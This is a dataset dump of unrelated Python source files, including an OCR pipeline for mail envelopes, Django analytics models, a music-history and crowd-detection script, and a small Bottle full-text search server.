id (stringlengths 1-265) | text (stringlengths 6-5.19M) | dataset_id (stringclasses, 7 values) |
---|---|---|
3259068 | <gh_stars>1-10
from setuptools import find_packages
from setuptools import setup
with open('README.rst') as f:
readme = f.read()
setup(
name='progeny',
version='0.2.0',
description='Simple but powerful management for complex class hierarchies',
long_description=readme,
url='https://github.com/GoodRx/progeny',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
classifiers=(
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
),
packages=find_packages('src'),
package_dir={
'': 'src',
},
)
| StarcoderdataPython |
3274208 | # import the necessary packages
import cv2
from imutils.perspective import four_point_transform
import pytesseract
import argparse
import imutils
import re
import numpy as np
import io
from PIL import Image, ImageEnhance, ImageFilter
import datetime
from collections import namedtuple
import os
def ocr_code():
# empty output folder
dir = '/home/pi/output'
for f in os.listdir(dir):
os.remove(os.path.join(dir, f))
restart_code = 0
print(datetime.datetime.now())
# in terminal: python ocr.py -i input/mail1.jpg
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image" , required=False, help="path to input image to be OCR'd")
ap.add_argument("-d", "--debug", type=int, default=1, help="whether or not we are visualizing each step of the pipeline")
ap.add_argument("-c", "--min-conf", type=int, default=0, help="minimum confidence value to filter weak text detection")
# check to see if *digit only* OCR should be performed, and if so, update our Tesseract OCR options
# ap.add_argument("-d", "--digits", type=int, default=1, help="whether or not *digits only* OCR will be performed")
# if args["digits"] > 0:
# options = "outputbase digits"
# text = pytesseract.image_to_string(rgb, config=options)
# load the input image from disk
args = vars(ap.parse_args())
if args["image"]:
orig = cv2.imread(args["image"])
else:
orig = cv2.imread("/home/pi/2.jpg") # for our project, 2.jpg is the latest image captured
cv2.imwrite("/home/pi/output/0-original.jpg", orig)
# resize input image and compute the ratio of the *new* width to the *old* width
image = orig.copy()
image = imutils.resize(image, width=600)
ratio = orig.shape[1] / float(image.shape[1])
# convert the image to grayscale, blur it, and apply edge detection to reveal the outline of the input image
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(gray, (5, 5), 0)
edged = cv2.Canny(blurred, 30, 150) # or try cv2.Canny(blurred, 75, 200)
# save outputs for troubleshooting
# (NOT USED) if args["debug"] == 1:
cv2.imwrite("/home/pi/output/1-gray.jpg", gray)
cv2.imwrite("/home/pi/output/2-blurred.jpg", blurred)
cv2.imwrite("/home/pi/output/3-edged.jpg", edged)
# ================================================ IMAGE OUTLINE =============================================
# detect contours in the edge map, sort them by size (in descending order), and grab the largest contours
# Use a copy of the image e.g. edged.copy() because findContours alters the image
cnts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
cnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:5]
# initialize a contour that corresponds to the input image outline
contours = None
# loop over the contours
for c in cnts:
# approximate the contour
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, 0.02 * peri, True)
# if this is the first contour we've encountered that has four vertices, then we can assume we've found the input image
if len(approx) == 4:
contours = approx
break
height, width, channels = image.shape
# if the input image contour is empty then our script could not find the outline of the item
if contours is None:
# raise Exception(("Could not find receipt outline. Try debugging your edge detection and contour steps."))
print("\nCould not find outline.") # "Try debugging your edge detection and contour steps."
# If no contours are found, assume the boundary is the contour so that we have some output
contours = np.array([[[0, 0]],[[0, height]],[[width, height]],[[width, 0]]], dtype=np.int32)
# Add a padding to improve OCR on text close to edges
padding = 5
contours[0][0][0] = contours[0][0][0] - padding # max(0, contours[0][0][0] - padding)
contours[0][0][1] = contours[0][0][1] - padding # max(0, contours[0][0][1] - padding)
contours[1][0][0] = contours[1][0][0] - padding # max(0, contours[1][0][0] - padding)
contours[1][0][1] = contours[1][0][1] + padding # min(height, contours[1][0][1] + padding)
contours[2][0][0] = contours[2][0][0] + padding # min(width, contours[2][0][0] + padding)
contours[2][0][1] = contours[2][0][1] + padding # min(height, contours[2][0][1] + padding)
contours[3][0][0] = contours[3][0][0] + padding # min(width, contours[3][0][0] + padding)
contours[3][0][1] = contours[3][0][1] - padding # max(0, contours[3][0][1] - padding)
print("\nSo we continue assuming the full image needs to be OCR'ed.")
print("\nContours: \n", contours)
# print("Contour Shape: ", contours.shape)
# print(type(contours),contours.dtype)
# draw the contour of the input image on the image
outline = image.copy()
cv2.drawContours(outline, [contours], -1, (0, 255, 0), 2) # -1 signifies drawing all contours
cv2.imwrite("/home/pi/output/4-outline.jpg", outline)
# apply a four-point perspective transform to the *original* image to obtain a top-down bird's-eye view of the input image
card = four_point_transform(orig, contours.reshape(4, 2) * ratio)
cv2.imwrite("/home/pi/output/5-transformed.jpg", card)
# convert the input image from BGR to RGB channel ordering
rgb = cv2.cvtColor(card, cv2.COLOR_BGR2RGB)
cv2.imwrite("/home/pi/output/6-rgb.jpg", rgb)
# Enhance image to get clearer results from image_to_text
enhancedimage = Image.open("/home/pi/output/6-rgb.jpg")
# enhancedimage = enhancedimage.convert('L')
enhancedimage = enhancedimage.convert("RGBA")
newimdata = []
datas = enhancedimage.getdata()
for item in datas:
if item[0] < 220 or item[1] < 220 or item[2] < 220:
newimdata.append(item)
else:
newimdata.append((255, 255, 255))
enhancedimage.putdata(newimdata)
enhancedimage = enhancedimage.filter(ImageFilter.MedianFilter()) # a little blur
enhancer = ImageEnhance.Contrast(enhancedimage)
enhancedimage = enhancer.enhance(2)
enhancer = ImageEnhance.Sharpness(enhancedimage)
enhancedimage = enhancer.enhance(2)
# Convert image to black and white
enhancedimage = enhancedimage.convert('1')
enhancedimage.save("/home/pi/output/7-enhanced.jpg")
# ================================================ BACKUP ====================================================
# use Tesseract to OCR the image
# text_full_for_backup = pytesseract.image_to_string(enhancedimage)
# print("\nRAW OUTPUT")
# print("=============")
# print(text_full_for_backup)
# backup_text = open('/home/pi/output/backup.txt', 'w+')
# backup_text.writelines([str(datetime.datetime.now()),"\n"])
# backup_text.writelines(text_full_for_backup)
# backup_text.close()
# # (NOT USED) Clean up text: strip out non-ASCII text from text because OpenCV replaces each unknown character with a ?
# # text = "".join([c if ord(c) < 128 else "" for c in text]).strip()
# # ================================= SPLITTING SENDER vs RECEIVER LOCATIONS =====================================
print("\nTrying to OCR original image.")
# # create a named tuple which we can use to create locations of the input document which we wish to OCR
OCRLocation = namedtuple("OCRLocation", ["id", "bbox", "filter_keywords"])
# # "bbox": Bounding box coordinates use the order [x, y, w, h] where x and y are the top-left coordinates, and w and h are the width and height
# # "filter_keywords": A list of words that we do not wish to consider for OCR
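# # Illustrative example (hypothetical values, not from the original script): an entry such as
# #   OCRLocation("sender", (0, 0, 300, 160), ["sender", "name", "address"])
# # would OCR only a 300x160-pixel region anchored at the top-left corner and drop any OCR'd line that
# # contains one of the filter keywords; the actual regions used below are computed from the image size.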
while restart_code < 8:  # We loop so that OCR can be retried with a different image variant (see the codes below) each time it fails
# restart_code = 0: Use RGB image
# restart_code = 1: Use enhanced image
# restart_code = 2: Rotate RGB image 90 CW
# restart_code = 3: Rotate RGB image 90 CCW
# restart_code = 4: Rotate RGB image 180
# restart_code = 5: Rotate enhanced image 90 CW
# restart_code = 6: Rotate enhanced image 90 CCW
# restart_code = 7: Rotate enhanced image 180
if restart_code == 0:
enhancedimage = cv2.imread("/home/pi/output/6-rgb.jpg")
elif restart_code == 1:
print("OCR failed. Trying again with enhanced image (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/7-enhanced.jpg")
elif restart_code == 2:
print("OCR failed. Trying again with 90 CW rotation (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/6-rgb.jpg")
enhancedimage = cv2.rotate(enhancedimage, cv2.ROTATE_90_CLOCKWISE)
elif restart_code == 3:
print("OCR failed. Trying again with 90 CCW rotation (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/6-rgb.jpg")
enhancedimage = cv2.rotate(enhancedimage, cv2.ROTATE_90_COUNTERCLOCKWISE)
elif restart_code == 4:
print("OCR failed. Trying again with 180 rotation (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/6-rgb.jpg")
enhancedimage = cv2.rotate(enhancedimage, cv2.ROTATE_180)
elif restart_code == 5:
print("OCR failed. Trying again with 90 CW rotation (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/7-enhanced.jpg")
enhancedimage = cv2.rotate(enhancedimage, cv2.ROTATE_90_CLOCKWISE)
elif restart_code == 6:
print("OCR failed. Trying again with 90 CCW rotation (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/7-enhanced.jpg")
enhancedimage = cv2.rotate(enhancedimage, cv2.ROTATE_90_COUNTERCLOCKWISE)
elif restart_code == 7:
print("OCR failed. Trying again with 180 rotation (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/7-enhanced.jpg")
enhancedimage = cv2.rotate(enhancedimage, cv2.ROTATE_180)
cv2.imwrite("/home/pi/output/8-locations.jpg", enhancedimage)
height, width, channels = enhancedimage.shape
# define the locations of each area of the document we wish to OCR
# sender_start_point = (0, 0)
# sender_end_point = (int(width/2), int(height/4))
# receiver_start_point = (0, int(height/4))
# receiver_end_point = (int(width), int(height)) # end point - not distance from start (like bbox)
OCR_LOCATIONS = [
OCRLocation("sender", (0, 0, int(width/2), int(height/3)), ["sender", "name", "address"]),
OCRLocation("receiver", (0, int(height/3), int(width), int(height*2/3)), ["receiver", "name", "address"]),
]
# initialize a results list to store the document OCR parsing results
parsingResults = []
if restart_code == 1:
# before starting OCR_locations for the rotated image, save a backup of the previous locations image so that, if OCR keeps failing, we can inspect the original OCR locations and determine why it failed
cv2.imwrite("/home/pi/output/8a-RGBlocations.jpg", boundinglocations)
if restart_code == 2:
# before starting OCR_locations for the rotated image, save a backup of the previous locations image so that, if OCR keeps failing, we can inspect the original OCR locations and determine why it failed
cv2.imwrite("/home/pi/output/8b-enhancedlocations.jpg", boundinglocations)
if restart_code == 3:
# before starting OCR_locations for the rotated image, save a backup of the previous locations image so that, if OCR keeps failing, we can inspect the original OCR locations and determine why it failed
cv2.imwrite("/home/pi/output/8c-rotatedCWlocations.jpg", boundinglocations)
if restart_code == 4:
# before starting OCR_locations for the rotated image, save a backup of the previous locations image so that, if OCR keeps failing, we can inspect the original OCR locations and determine why it failed
cv2.imwrite("/home/pi/output/8d-rotatedCCWlocations.jpg", boundinglocations)
# loop over the locations of the document we are going to OCR
for loc in OCR_LOCATIONS:
# extract the OCR ROI from the aligned image
locationsimage = cv2.imread("/home/pi/output/8-locations.jpg")
(x, y, w, h) = loc.bbox
# draw outline on main image for reference
boundinglocations = cv2.rectangle(locationsimage, (x, y), (x + w, y + h), (0, 0, 255), 5) # cv2.rectangle(image, start_point, end_point, color, thickness)
# save image that shows OCR locations
cv2.imwrite("/home/pi/output/8-locations.jpg", boundinglocations)
roi = locationsimage[y:y + h, x:x + w]
# OCR the ROI using Tesseract
text = pytesseract.image_to_string(roi)
# break the text into lines and loop over them
for line in text.split("\n"):
# if the line is empty, ignore it
if len(line) == 0:
continue
# convert the line to lowercase and then check to see if the line contains any of the filter keywords (these keywords are part of the *form itself* and should be ignored)
lower = line.lower()
count = sum([lower.count(x) for x in loc.filter_keywords])
# if the count is zero then we know we are *not* examining a text field that is part of the document itself (e.g., info on the field, an example, help text, etc.)
if count == 0:
# update our parsing results dictionary with the OCR'd text if the line is *not* empty
parsingResults.append((loc, line))
# print(parsingResults)
# initialize a dictionary to store our final OCR results
results = {}
# loop over the results of parsing the document
for (loc, line) in parsingResults:
# grab any existing OCR result for the current ID of the document
r = results.get(loc.id, None)
# if the result is None, initialize it using the text and location namedtuple (converting it to a dictionary as namedtuples are not hashable)
if r is None:
results[loc.id] = (line, loc._asdict())
# otherwise, there exists an OCR result for the current area of the document, so we should append our existing line
else:
# unpack the existing OCR result and append the line to the existing text
(existingText, loc) = r
text = "{}\n{}".format(existingText, line)
# update our results dictionary
results[loc["id"]] = (text, loc)
# print(results)
OCR_text = []
for (locID, result) in results.items():
# unpack the result tuple
(text, loc) = result
# # display the OCR result to our terminal
# print(loc["id"])
# print("=" * len(loc["id"]))
# print("{}\n\n".format(text))
OCR_text.append(loc["id"])
OCR_text.append("{}\n\n".format(text))
# print("\n", OCR_text)
sender_content = OCR_text[1]
# print(sender_content)
receiver_content = OCR_text[3]
# print(receiver_content)
# ========================================= REGULAR EXPRESSIONS =============================================
# test regex with https://regexr.com/
# regex commands are https://www.w3schools.com/python/python_regex.asp
# # use regular expressions to parse out names
# nameExp = r"^[\w'\-,.][^0-9_!¡?÷?¿/\\+=@#$%ˆ&*(){}|~<>;:[\]]{2,}"
# nameExp = r"\b([A-Z]\w+)\b" # Gets all words
nameExp = r"\b([A-Z]\w+(?=[\s\-][A-Z])(?:[\s\-][A-Z]\w+)+)\b"
sender_names = re.findall(nameExp, sender_content)
# print("\nSender Names: ", sender_names)
receiver_names = re.findall(nameExp, receiver_content)
# print("\nReceiver Names: ", receiver_names)
# # use regular expressions to parse out mailing addresses
# # mailExp = r"\d{1,4}( \w+){1,5}, (.*), ( \w+){1,5}, (.*), [0-9]{5}(-[0-9]{4})?"
mailExp = r"\d{1,4} [\w\s'\-,.]{1,} [0-9]{5}?"
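# # Illustrative note (hypothetical sample text, not from the original script): on an OCR'd line such as
# # "John Smith 123 Main Street Springfield 62704", nameExp is intended to capture runs of consecutive
# # capitalized words (here "John Smith"), while mailExp is intended to capture a street-number-to-ZIP
# # span (here "123 Main Street Springfield 62704").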
sender_addr = re.findall(mailExp, sender_content)
# print("\nSender Addr: ", sender_addr)
receiver_addr = re.findall(mailExp, receiver_content)
# print("\nReceiver Addr: ", receiver_addr)
print("\nSender Name: ")
# # loop over the detected name and print them to our terminal
# for name in names:
# print(name.strip())
if sender_names:
sender_name_var = sender_names[0].strip()
else:
sender_name_var = "NONE"
print(sender_name_var)
print("\nSender Address: ")
# # loop over the detected mailing addresses and print them to our terminal
# for addr in mail_addresses:
# print(addr.strip())
if sender_addr:
sender_addr_var = sender_addr[0]
restart_code = 8 # so that loop breaks
else:
sender_addr_var = "NONE"
restart_code += 1
print(sender_addr_var)
print("\nReceiver Name: ")
if receiver_names:
receiver_name_var = receiver_names[0].strip()
else:
receiver_name_var = "NONE"
print(receiver_name_var)
print("\nReceiver Address: ")
if receiver_addr:
receiver_addr_var = receiver_addr[0]
else:
receiver_addr_var = "NONE"
print(receiver_addr_var)
print("\n")
# # use regular expressions to parse out phone numbers
# phoneNums = re.findall(r'[\+\(]?[1-9][0-9 .\-\(\)]{8,}[0-9]', text)
# # loop over the detected phone numbers and print them to our terminal
# print("PHONE NUMBERS")
# for num in phoneNums:
# print(num.strip())
# # use regular expressions to parse out email addresses
# emails = re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", text)
# # loop over the detected email addresses and print them to our terminal
# print("EMAILS")
# for email in emails:
# print(email.strip())
# Write outputs to files
OCR_text_file = open('/home/pi/output/OCR_text.txt', 'w+')
OCR_text_file.writelines([str(datetime.datetime.now())])
OCR_text_file.writelines(["\nSender Name: ", sender_name_var])
OCR_text_file.writelines(["\nSender Address: ", sender_addr_var])
OCR_text_file.writelines(["\nReceiver Name: ", receiver_name_var])
OCR_text_file.writelines(["\nReceiver Address: ", receiver_addr_var])
OCR_text_file.close()
receiver_text = open('/home/pi/output/receiver.txt', 'w+')
receiver_text.writelines(receiver_name_var)
receiver_text.close()
if __name__ == '__main__':
ocr_code() | StarcoderdataPython |
1788249 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import requests
from django.conf import settings
from django.db import models
from django.core.exceptions import ValidationError
from solo.models import SingletonModel
from django_datajsonar.models import AbstractTask
class Query(models.Model):
"""Log of successful queries, stored for analytics purposes"""
class Meta:
verbose_name_plural = "Tabla consultas"
ids = models.TextField()
args = models.TextField()
timestamp = models.DateTimeField()
ip_address = models.CharField(max_length=200, null=True)
params = models.TextField()
api_mgmt_id = models.IntegerField(blank=True, null=True, unique=True)
uri = models.TextField(default='')
status_code = models.IntegerField(default=0)
user_agent = models.TextField(default='')
request_time = models.DecimalField(max_digits=30, decimal_places=25, default=0)
def __unicode__(self):
return u'Query at %s: %s' % (self.timestamp, self.ids)
class ImportConfig(SingletonModel):
class Meta:
verbose_name = "Configuración de importación de analytics"
SCRIPT_PATH = settings.IMPORT_ANALYTICS_SCRIPT_PATH
endpoint = models.URLField()
token = models.CharField(max_length=64)
kong_api_id = models.CharField(max_length=64)
last_cursor = models.CharField(max_length=64, blank=True)
def clean(self):
status_code = requests.head(
self.endpoint,
headers={'Authorization': 'Token {}'.format(self.token)}
).status_code
if status_code != 200:
raise ValidationError('URL / Token inválido')
def get_results(self, from_date=None, to_date=None, limit=1000, offset=0):
"""Wrapper around requests to hit the configured endpoint"""
return requests.get(
self.endpoint,
headers=self.get_authorization_header(),
params={'from_date': from_date,
'to_date': to_date,
'limit': limit,
'offset': offset,
'kong_api_id': self.kong_api_id}
).json()
def get_authorization_header(self):
"""Returns the auth header formatted for use with the requests library"""
return {'Authorization': 'Token {}'.format(self.token)}
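# Illustrative usage sketch (not part of the original module; assumes django-solo's get_solo()
# accessor and a reachable endpoint):
#
#   config = ImportConfig.get_solo()
#   page = config.get_results(from_date='2019-01-01', to_date='2019-02-01', limit=500, offset=0)
#
# get_results() forwards the date range, the paging arguments and kong_api_id as query parameters
# and returns the decoded JSON payload.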
class AnalyticsImportTask(AbstractTask):
class Meta:
verbose_name_plural = "Corridas de importación de analytics"
verbose_name = "Corrida de importación de analytics"
class HitsIndicator(models.Model):
class Meta:
verbose_name = 'Consultas por día de serie'
verbose_name_plural = 'Consultas por día de series'
unique_together = ('serie_id', 'date', )
serie_id = models.CharField(max_length=64)
date = models.DateField()
hits = models.IntegerField()
| StarcoderdataPython |
3317229 | <gh_stars>0
import unittest
from rolling_registry import RollingRegistry
#from my_sum import sum
class RollingRegistryTest(unittest.TestCase):
def test_empty_rolling_registry(self):
registry = RollingRegistry(3)
self.assertEqual(registry.last(), None)
self.assertEqual(registry.size(), 0)
self.assertEqual(registry.average(), 0)
def test_non_empty_rolling_registry(self):
registry = RollingRegistry(4)
registry.add(1)
registry.add(2)
self.assertEqual(registry.last(), 2)
self.assertEqual(registry.size(), 2)
self.assertEqual(registry.average(), 1.5)
def test_overflowing_rolling_registry(self):
registry = RollingRegistry(4)
registry.add(1)
registry.add(2)
registry.add(3)
registry.add(4)
registry.add(5)
self.assertEqual(registry.last(), 5)
self.assertEqual(registry.size(), 4)
self.assertEqual(registry.average(), 3.5)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1650729 | from credential import Credential
class User:
"""
A class for user credentials
"""
users_list = []
user_credentials = []
def __init__(self, username, userpassword):
'''
Properties of the user
'''
self.username = username
self.userpassword = userpassword
def register(self):
'''
Method that saves the credentials created by a new user
'''
User.users_list.append(self)
@classmethod
def save_credent_user(cls, credent):
'''
An instance to save a credential for a user
'''
@classmethod
def login_checker(cls, username, userpassword):
'''
Method that checks whether the user is already registered and, if so, allows them to log in
'''
for user in User.users_list:
if user.username == username and user.userpassword == userpassword:
return user
return False
@classmethod
def display_users(cls):
return cls.users_list
| StarcoderdataPython |
1734171 | <gh_stars>1-10
from . import json_serialiser
from . import time_util | StarcoderdataPython |
172176 | from os import path
import click
import contxt.schemas as schemas
from contxt.services.base_graph_service import BaseGraphService
from contxt.utils.contxt_environment import ContxtEnvironment
@click.command()
@click.option('--fresh-from-file', type=str, help='Overwrite/init from a specific environment file')
def init(fresh_from_file: str):
"""Initialize all schemas"""
if fresh_from_file:
print(f'Loading fresh config from file: {fresh_from_file}')
config = ContxtEnvironment(filename=fresh_from_file)
config.rewrite_to_default_file()
print('Config file has been initialized')
print('Updating schemas')
config = ContxtEnvironment()
schema_dir = path.dirname(schemas.__file__)
for env in config.config.get_graph_environments_for_current_context():
base_graph = BaseGraphService(env, load_schema=False)
base_graph.update_schema(service_name=env.service, base_file_path=schema_dir)
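# Illustrative invocation sketch (hypothetical entry point, not from the original file): assuming the
# command is wired up as a console script named `contxt-init`, running
#   contxt-init --fresh-from-file ./contxt_environment.yml
# would rewrite the default config from that file and then update the graph schemas for every
# environment in the current context.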
| StarcoderdataPython |
63947 | import pytest
def test_import_pipeline():
import kcwidrp.pipelines.kcwi_pipeline
| StarcoderdataPython |
4814454 | <reponame>DjLess/Dj-less-main<gh_stars>0
"""
Welcome to the DJ Less source code. Here you will find everything you need to understand how DJ Less works.
At this time, this code was made only for the data.csv history provided by Serato's virtual console. In the future our
intention is to make this work for all kinds of history files from any DJ software or controller.
For easy comprehension of the code, every chunk is tagged with a "#" comment before it explaining what is going on.
"""
#>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# 1) SET UP
#Ignore future warning from cvlib
def ignore():
# this module is used to ignore warning msgs
from warnings import simplefilter
simplefilter(action='ignore', category=FutureWarning)
ignore()
#Import packages
import cvlib as cv
import cv2
import numpy as np
import mysql.connector
import pandas as pd
import numpy as np
import csv
#Enable connection with SQL server
#Note: you should create a SQL server and enable the connection
mydb = mysql.connector.connect(
host="localhost",
user="root",
passwd="<PASSWORD>",
database="music_db"
)
mycursor = mydb.cursor()
#>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# 2) READ MUSIC FILE.csv provided from controller program
print("Welcome to DJ less.v0")
print("step1 - Read musica data")
# 2.1 Read text archive
try:
#musicain = input("Write the name or the path of the file that you wish to analyze: ")
musicain = "example_history.csv"
musica = pd.read_csv(musicain)
except FileNotFoundError:
print("Error in the file name or path")
raise
# 2.2 Prepare data.
print("step 2 - Edit data")
# 2 Edit text archive
mycursor.execute("SELECT MAX(party_id) AS maximum FROM music")
result = mycursor.fetchall()
for i in result:
n= (i[0])
try:
musica['party_id'] = n+1
except:
musica['party_id'] = 1
#musica['party_type'] = input("write the genre of the party: ")
musica['party_type'] = ("edm party")
musica['position'] = np.arange(len(musica)) #add a column of relative position to the list
musica = musica.reindex(columns=['party_id', 'position', 'name', 'year', 'bpm', 'key', 'start time', 'end time', 'playtime', 'party_type']) #re-arrange and add mising rows if not in file
musica.fillna(0, inplace=True) # fill "NaN" data with 0's
musica1 = musica[1:]
musica1 = musica1.values.tolist() # convert the dataframe rows to a list of lists
# 2.2.2 Add a relative time column to music
'''
Create two time columns: one as a string and the other as a timedelta.
'''
import datetime as dt
from datetime import datetime, date
vacio = datetime.strptime(('00:00:00'), '%H:%M:%S').time()
inicio = datetime.strptime(musica1[0][6], '%H:%M:%S').time()
fin = datetime.strptime(musica1[len(musica1)-1][6], '%H:%M:%S').time()
duracion = datetime.combine(date.today(), fin) - datetime.combine(date.today(), inicio)
a = datetime.combine(date.today(), inicio) - datetime.combine(date.today(), inicio)
time=[a]
time1 = [['00:00:00']]
# Note: in this step we are arranging our time column every 10 seconds; it can be modified by changing the "minutes" and "seconds"
# values below. Thanks to this we can have our data arranged by second of the party (vital information)
while a < ((duracion) + dt.timedelta(minutes=0)):
a = a + dt.timedelta(seconds=10)
time.append(a)
time1.append([str((dt.datetime.combine(dt.date(1,1,1),vacio) + a).time())])
'''
To make counting easier, the timedelta list `time` is converted to seconds; this way it is easier to know
which one is greater, and no further transformations are needed when we start to analyze the video
'''
# 2.2.3 time to time_second
# (note: time_second stores each entry of `time` as an integer number of seconds, e.g. [0, 10, 20, ...])
x=0
time_second=[]
while x < len(time):
a = time[x].total_seconds()
time_second.append(int(a))
x+=1
# 2.2.4 Indicate the key seconds on the music (when every song has started relatively)
x=0
key_second=[]
while x < len(musica1):
a = datetime.combine(date.today(), datetime.strptime(musica1[x][6], '%H:%M:%S').time()) - datetime.combine(
date.today(), datetime.strptime(musica1[0][6], '%H:%M:%S').time())
secondsa = int(a.total_seconds())
key_second.append(secondsa)
x+=1
# 2.2.5 Put music and time columns together
repeat=0
x=0
count=0
while repeat < (len(time_second)):
if count < len(key_second):
if time_second[x]== 0:
time1[x].extend(musica1[count])
#print(time1[x])
x+=1
repeat+=1
elif time_second[x] < key_second[count]:
time1[x].extend(musica1[count])
#print(time1[x])
x+=1
repeat+=1
else:
count+=1
else:
count=len(key_second)
time1[x].extend(musica1[count-1])
#print(time1[x])
x+=1
repeat+=1
musica2=time1
#>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# 3) Detect images
print("step 3 - Detect persons")
# 3.1 Open video
webcam = cv2.VideoCapture('tokyo_walk.mp4')
if not webcam.isOpened():
print("Could not open webcam")
exit()
# 3.2 loop through frames
fps = int(webcam.get(cv2.CAP_PROP_FPS))
count = 0
count_list = 0
npersons=[]
while webcam.isOpened():
# read frame from webcam
try:
status, frame = webcam.read()
if count%(time_second[count_list]*fps) == 0 :
# notice that we are using the time_second column to pick the frames so we don't analyze the whole video
if not status:
print("End of the video")
# apply face detection
try:
bbox, label, conf = cv.detect_common_objects(frame)
npersons.append(label)
print(npersons)
count_list=len(npersons)
except:
webcam.release()
count+=1
except ZeroDivisionError:
status, frame = webcam.read()
if count ==0:
# apply face detection
bbox, label, conf = cv.detect_common_objects(frame)
npersons.append(label)
print(str(npersons) + "this is frame 1")
count_list = len(npersons)
count += 1
except IndexError:
webcam.release()
# 3.3 Create a column with only the number of persons detected through the analysis
try:
npersons_1 =[]
x=0
while x<= len(npersons):
npersons_1.append(int((npersons[x].count('person'))))
x+=1
except:
pass
cv2.destroyAllWindows()
# 3.4 Add the column of number of person detected to our main list
x=0
while x < len(musica2):
musica2[x].append(npersons_1[x])
x+=1
for row in musica2:
print(row)
#>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# Copy data into the database
print("step 4 - copy data into server")
sqlFormula = "INSERT INTO music (second, party_id, position, song_name, year, song_bpm, song_key, start_time, end_time, playtime, party_type, number_of_people) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
mycursor.executemany(sqlFormula, musica2)
mydb.commit()
print("successful copy!!")
print("bye!")
| StarcoderdataPython |
3382513 | <filename>src/dipus/websetup.py<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import argparse
import logging
from bottle import Bottle, route, run, request, response, abort
from bottle import Jinja2Template
from bottle import static_file
# increase POST request body size
import bottle
bottle.BaseRequest.MEMFILE_MAX = 1024 * 1024
import simplejson
import docstore
import config
app = Bottle()
conf = None
def ret_jsonp(request, ret):
json_response = simplejson.dumps(ret)
response.content_type = 'application/json; charset=utf-8'
callback_function = request.GET.get('callback')
if callback_function:
json_response = ''.join([callback_function, '(', json_response, ')'])
return json_response
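# Illustrative note (hypothetical request, not from the original file): for a request carrying
# ?callback=handleResults, ret_jsonp wraps the JSON body so the response becomes
# handleResults({"total": ..., "hits": [...]}); without the callback parameter the plain JSON is returned.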
def auth(password):
''' not implemented yet '''
return True
@app.route('/')
def index():
distdir = os.path.dirname(os.path.abspath(__file__))
tpl = os.path.join(distdir, '_templates/index.tpl')
return Jinja2Template(name=tpl).render(var='var')
@app.route('/favicon.ico')
def favicon():
pass
@app.route('/_static/<filename:path>')
def static_files(filename):
distdir = os.path.dirname(os.path.abspath(__file__))
static_dir = os.path.join(distdir, '_static')
return static_file(filename, root=static_dir)
@app.route('/_list/')
def listindex():
''' return index list '''
password = request.forms.get('password')
if auth(password) is False:
abort(403)
ret = {
"list": docstore.listindex(conf.indexroot)
}
return ret_jsonp(request, ret)
@app.route('/<_index>', method='POST')
def updateDocument(_index):
password = request.forms.get('password')
if auth(password) is False:
abort(403)
path = request.forms.get('path')
if not path:
abort(400, "path is not set")
message = request.forms.get('message')
if not message:
abort(400, "message is not set")
title = request.forms.get('title')
if not title:
title = ""
doc_url = request.forms.get('doc_url')
if not doc_url:
doc_url = ""
posted = {
'_index': _index.decode('utf-8'),
'path': path.decode('utf-8'),
'message': message.decode('utf-8'),
'title': title.decode('utf-8'),
'doc_url': doc_url.decode('utf-8')
}
ret = docstore.register(posted, conf.indexroot)
return simplejson.dumps(ret)
@app.route('/_msearch/')
def multisearch():
password = request.forms.get('password')
if auth(password) is False:
abort(403) # forbidden
query = request.query.get('q')
indexes = request.query.get('indexes')
if query is None or indexes is None or len(indexes) == 0:
abort(400, "query or indexes is not set")
results = []
total = 0
for idx in indexes.split(","):
if idx in docstore.listindex(conf.indexroot):
s_r = docstore.search(idx, query, conf.indexroot)
for r in s_r: # flatten
results.append(r)
total += len(s_r)
ret = {
"total": total,
"hits": results
}
return ret_jsonp(request, ret)
@app.route('/<_index>/_search')
def query(_index):
password = request.forms.get('password')
if auth(password) is False:
abort(403)
query = request.query.get('q')
results = docstore.search(_index, query, conf.indexroot)
ret = {
"total": len(results),
"hits": results
}
return ret_jsonp(request, ret)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Dipus: simple full-text search server')
parser.add_argument('-c', '--config', nargs='?',
dest='conffile', action='store',
help='Config file path')
args = parser.parse_args()
conf = config.Config(args.conffile)
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(message)s')
run(app,
host=conf.host, port=conf.port,
reloader=True)
| StarcoderdataPython |
1670029 | import xpc.xpc as xpc
import rospy
import xplane_ros.msg as xplane_msgs
import rosplane_msgs.msg as rosplane_msgs
from geometry_msgs.msg import Twist
